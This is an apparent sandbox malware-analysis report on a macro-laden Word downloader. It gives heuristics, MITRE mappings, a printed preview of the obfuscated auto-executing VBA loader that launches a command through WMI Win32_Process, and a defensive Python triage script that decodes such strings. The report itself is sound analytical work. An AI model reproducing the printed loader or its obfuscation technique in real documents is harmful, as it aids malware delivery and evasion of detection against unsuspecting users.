MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying obfuscated VBA macros. The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics indicate that the macros auto-execute and hand decoder-reconstructed strings to CreateObject and shell/execution sinks, so the usual CreateObject/Shell/URL indicators never appear as plain text in the source. In the extracted source the visible sink is `CreateObject(XsNNa_s("yiwa...")).Create`, whose first argument (`j_iIutj`) is built by running the same decoder, `XsNNa_s`, over the contents of two MSForms TextBox controls declared in the VB_Control attributes (`NfTYr68p` and `EAmMKG9`): the command line lives in form-control text rather than in the macro body. Removing every occurrence of the repeated token `yiwa` from the literal yields `winmgmts:Win32_Process`, i.e. process creation through the WMI Win32_Process class, which matches the junk-token Replace decoder shape the loader heuristic describes; the body of `XsNNa_s` is outside the preview, so treat this as an inference from the string rather than a confirmed decode. The surrounding `Do ... Loop Until` blocks of arithmetic on undefined variables under `On Error Resume Next` are dead code inserted to pad and disguise the loader. The ClamAV signature Doc.Downloader.Sagent-7178142-0 classifies the document as a downloader.
Heuristics (8)
- ClamAV: Doc.Downloader.Sagent-7178142-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Sagent-7178142-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted macros.bas below, so this marker is redundant with the VBA findings rather than independent evidence.)
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into drawing parts; it is not a network indicator and should not be treated as a download source.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29357 bytes | 098609d902136d4c544612c3f299c48a5d07630da5f8859d62066c872eb86954 |
Preview: first 1,000 lines of the extracted script (shown verbatim; the preview is cut off below)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "iP_UasF2, 0, 0, MSForms, TextBox"
Attribute VB_Control = "KzP19Z, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Fic3Oic, 2, 2, MSForms, TextBox"
Attribute VB_Control = "sAKWAi3, 3, 3, MSForms, TextBox"
Attribute VB_Control = "dpiNz7Li, 4, 4, MSForms, TextBox"
Attribute VB_Control = "iXT9cI, 5, 5, MSForms, TextBox"
Attribute VB_Control = "wHbUXGq, 6, 6, MSForms, TextBox"
Attribute VB_Control = "EAmMKG9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "s9dsN64, 8, 8, MSForms, TextBox"
Attribute VB_Control = "XEtisF4, 9, 9, MSForms, TextBox"
Attribute VB_Control = "mNisohpn, 10, 10, MSForms, TextBox"
Attribute VB_Control = "VwmUsJ, 11, 11, MSForms, TextBox"
Attribute VB_Control = "OV5XEB, 12, 12, MSForms, TextBox"
Attribute VB_Control = "RG2GZfYp, 13, 13, MSForms, TextBox"
Attribute VB_Control = "NfTYr68p, 14, 14, MSForms, TextBox"
Attribute VB_Control = "pLFXtJs, 15, 15, MSForms, TextBox"
Attribute VB_Control = "G31fts1, 16, 16, MSForms, TextBox"
Attribute VB_Control = "NtI9sr9, 17, 17, MSForms, TextBox"
Attribute VB_Control = "OcXikq8w, 18, 18, MSForms, TextBox"
Attribute VB_Control = "IJiF_T, 19, 19, MSForms, TextBox"
Attribute VB_Name = "mow_7p4"
Function A38vzGq()
On Error Resume Next
Do
If ObQzzwn2 = q8IS5v Then
JjUp9Fp = RRI4wnn _
- Hex(51 + Oct(960 / Round(372))) _
+ 287 - Fix(uQEYVf) - 81 - vcBomQ _
- uPYmiKIw * Sin(dhMCUf)
sTbwLzco = Tan(544)
End If
w5tBs6 = MprtIRJ _
* Round(jI4Hjm4Z) / EEjK1A6 / cizSJ8 + (CHLJoH4 _
/ Sin(OFcR2ml) / 921 * Sin(Qqi2tOc1))
For Each s2tLQO1 In Ub8qYVtz
k8O7Wn = KZ8sznf5 * Round(vMDBVp0) _
/ AGfAaFz / j6XiqVn + (jnUKfqK5 / Sin(jmk9_Qkw) _
/ 470 * Sin(bmB1ERv))
Next
Loop Until bsYcpRu = f11j7zG1
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
On Error Resume Next
Do
If Su3AIKi = qKtdHp Then
ztDYt7iF = AHzaFwwz _
- Hex(402 + Oct(799 / Round(831))) _
+ 174 - Fix(TwriHZ_j) - 198 - zZTiFLYA _
- Q6oddDSZ * Sin(iV1KbMBj)
zBqqtl = Tan(431)
End If
Q5XwJB = GNAEGkc _
* Round(hjIG5J) / Q3SO0v3O / Ik3Mzm + (qjMNWk _
/ Sin(DCrKauj) / 91 * Sin(IQOJdJ2F))
For Each tTbvjJ In NiGfsAd
c2paAwXp = vVZWI2SW * Round(OKBlZTj) _
/ cOrwTSO / tfEFKZ6A + (woZpQC / Sin(rDBrSo_) _
/ 347 * Sin(LhGD5_b))
Next
Loop Until dMAmqYdU = Hkbwv7
CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
On Error Resume Next
Do
If U_kcW2CV = bZsizMmf Then
Y8jTzZWS = zsENVMG6 _
- Hex(781 + Oct(402 / Round(229))) _
+ 544 - Fix(r8J2pAi) - 47 - RjKi_Ob _
- i8fvwP * Sin(RfIlGrr8)
ptpz752 = Tan(263)
End If
qOE_6w1 = DEL5I2p_ _
* Round(Mzdh7ros) / Bl5jw5lQ / rRb15_ + (izH8kAAp _
/ Sin(HTQDNW1d) / 125 * Sin(GOQZiFA))
For Each jo7UvHw In B5jHh5
wwDF_a = nWjtdiAC * Round(CO_f7akv) _
/ HBsWRR / vSoNFm + (MDmi5d1w / Sin(Ld2njO_i) _
/ 46 * Sin(hMbLWwI0))
Next
Loop Until HXfKLjI5 = J5hYDpYR
On Error Resume Next
Do
If nipBXKj = QGYX5iO Then
U6_qAa = LKhpvTa _
- Hex(34 + Oct(651 / Round(235))) _
+ 922 - Fix(sqJJis_) - 216 - j7wimiw _
- UiEiPo * Sin(RL_iz0JY)
W06MAni = Tan(593)
End If
lujD3jI = WXbfPhXz _
* Round(u9nF66WQ) / Zc_fLM / GHCp8Z9U + (lXzMjj2f _
/ Sin(iIfP31Q) / 641 * Sin(wTDUmr8))
For Each ANHkzb In TS5iprGj
```
... (truncated)
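The loader heuristic above names three string-decoder shapes (numeric char-array, hex-string decode, junk-token Replace removal) and the preview shows one of them feeding `CreateObject(...).Create`. The script below is an added triage example, not code from this report or from the analyzer: it walks extracted VBA source, finds execution sinks, tries all three decoders on the string arguments, and tracks which MSForms controls feed a sink's arguments through one level of assignment. The assumption that `XsNNa_s` removes the token `yiwa` is made here, not confirmed by the sample (the decoder body is outside the preview); the `Chr(...)` chain and the `HexDec("...")` line in the sample input are constructed for the example, and `HexDec` is a hypothetical helper name.

```python
"""Triage helper for obfuscated VBA string loaders.

Added example for this report; not the analyzer's own heuristic code.
Input is VBA source as extracted by olevba (like the macros.bas artifact above).
"""
import re
from string import printable

SINK_RE = re.compile(
    r"\b(?:CreateObject|GetObject|Shell|URLDownloadToFile)\b|\.(?:Create|Run|Exec)\b", re.I)
STR_LIT_RE = re.compile(r'"((?:[^"]|"")*)"')
CHR_CHAIN_RE = re.compile(r"(?:Chr\(\s*\d+\s*\)\s*&?\s*){2,}", re.I)
CHR_RE = re.compile(r"Chr\(\s*(\d+)\s*\)", re.I)
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2}){4,}")
CONTROL_RE = re.compile(r'Attribute VB_Control = "(\w+),\s*\d+,\s*\d+,\s*MSForms,\s*(\w+)"')
CONTROL_REF_RE = re.compile(r"ThisDocument\.(\w+)")
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=\s*(.*)$")

# Constructed excerpt: the first four lines are copied from the preview above; the
# last two are made up here to exercise the other two decoder shapes the heuristic
# names (HexDec is a hypothetical helper name, not something in the sample).
SAMPLE_VBA = r'''
Attribute VB_Control = "EAmMKG9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "NfTYr68p, 14, 14, MSForms, TextBox"
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
Set o = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
Set h = CreateObject(HexDec("4D53584D4C322E584D4C48545450"))
'''


def is_clean(s):
    """True if s is non-empty printable ASCII with no control characters."""
    return bool(s) and all(c in printable and c not in "\t\n\r\x0b\x0c" for c in s)


def guess_junk_token(s, min_len=3, max_len=8, min_count=3, min_ratio=0.4):
    """Pick the repeated substring whose removal covers most of s (the
    Replace(s, "junk", "") shape). None when no token dominates the string."""
    best = (0, None)
    for n in range(min_len, max_len + 1):
        for tok in {s[i:i + n] for i in range(len(s) - n + 1)}:
            c = s.count(tok)
            if c >= min_count and n * c > best[0]:
                best = (n * c, tok)
    return best[1] if best[0] >= min_ratio * len(s) else None


def strip_junk_token(s, token=None):
    """Remove every occurrence of the junk token; None if the result is not clean text."""
    token = token or guess_junk_token(s)
    if not token:
        return None
    out = s.replace(token, "")
    return out if is_clean(out) else None


def decode_chr_chain(expr):
    """Chr(87) & Chr(83) & ... -> 'WS...' (numeric char-array shape)."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(expr))


def decode_hex(lit):
    """Even-length hex literal -> text, or None if it is not hex or not clean text."""
    if not HEX_RE.fullmatch(lit):
        return None
    out = bytes.fromhex(lit).decode("latin-1")
    return out if is_clean(out) else None


def logical_lines(src):
    """Join VBA continuation lines (trailing ' _') into single statements."""
    buf, out = [], []
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf.append(line[:-2])
            continue
        buf.append(line)
        out.append(" ".join(buf).strip())
        buf = []
    if buf:
        out.append(" ".join(buf).strip())
    return out


def triage(src):
    """Report each execution sink, its decoded string arguments, and which MSForms
    controls feed it (directly or via one level of variable assignment)."""
    controls = dict(CONTROL_RE.findall(src))  # control name -> MSForms type
    taint = {}                                 # variable -> controls feeding it
    findings = []
    for line in logical_lines(src):
        refs = {r for r in CONTROL_REF_RE.findall(line) if r in controls}
        is_sink = bool(SINK_RE.search(line))
        m = ASSIGN_RE.match(line)
        if m and not is_sink:                  # plain assignment: record control taint
            var, rhs = m.groups()
            via = set().union(*(taint.get(t, set()) for t in re.findall(r"\w+", rhs)))
            if refs or via:
                taint[var] = refs | via
            continue
        if not is_sink:
            continue
        decoded = []
        for lit in (s.replace('""', '"') for s in STR_LIT_RE.findall(line)):
            hx = decode_hex(lit)
            tok = None if hx else guess_junk_token(lit)
            stripped = strip_junk_token(lit, tok) if tok else None
            if hx:
                decoded.append(("hex", hx))
            elif stripped:
                decoded.append(("junk-token:" + tok, stripped))
            elif is_clean(lit):
                decoded.append(("literal", lit))
        for ch in CHR_CHAIN_RE.finditer(line):
            decoded.append(("chr-chain", decode_chr_chain(ch.group(0))))
        for t in re.findall(r"\w+", line):     # arguments carrying control taint
            refs |= taint.get(t, set())
        findings.append({"line": line, "decoded": decoded, "form_controls": sorted(refs)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_VBA):
        print(f["decoded"], "<- controls:", f["form_controls"])
```

Run against the full macros.bas (what `olevba` writes, or what `VBA_Parser(path).extract_macros()` yields per module) rather than this excerpt, since the sample's decoder is applied to control contents that are not in the macro text at all: the `form_controls` field tells you which `VB_Control` entries to pull from the form's storage stream to recover the actual command line.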